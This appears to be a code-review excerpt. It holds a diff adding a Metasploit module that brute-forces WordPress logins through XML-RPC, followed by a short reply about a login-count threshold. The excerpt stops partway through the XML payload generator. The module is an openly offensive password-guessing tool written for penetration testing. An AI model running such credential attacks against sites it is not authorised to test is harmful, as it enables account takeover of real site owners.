modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+              info,
+              'Name'            => 'WordPress XMLRPC Massive Bruteforce ',
+              'Description'     => %q{Wordpress Massive Burteforce attacks via wordpress XMLRPC service.},
+              'License'         => MSF_LICENSE,
+              'Author'          =>
+                  [
+                      'William (WCoppola@Lares.com)',
+                      'Sabri (@KINGSABRI)'
+                  ],
+              'References'      =>
+                  [
+                      ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'],
+                      ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html']
+                  ]
+          ))
+
+    register_options(
+        [
+            OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
+                                        File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
+            OptPath.new('WPPASS_FILE',  [ true, 'File containing passwords, one per line',
+                                          File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
+        ], self.class)
+
+
+    register_advanced_options(
+        [
+            OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
+            OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5])
+        ], self.class)
+  end
+
+  def usernames
+    File.readlines(datastore['WPUSER_FILE']).map {|user| user.chomp}
+  end
+
+  def passwords
+    File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
+  end
+
+  def generate_xml user
+
+    print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
+    xml_payloads = []                          # Container for all generated XMLs
+    xml = ""
+    # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
```

Comment:
Yes, I make it 1500 but the exact value is `1788` so intentionally I make it less in the code but the comment has the real value.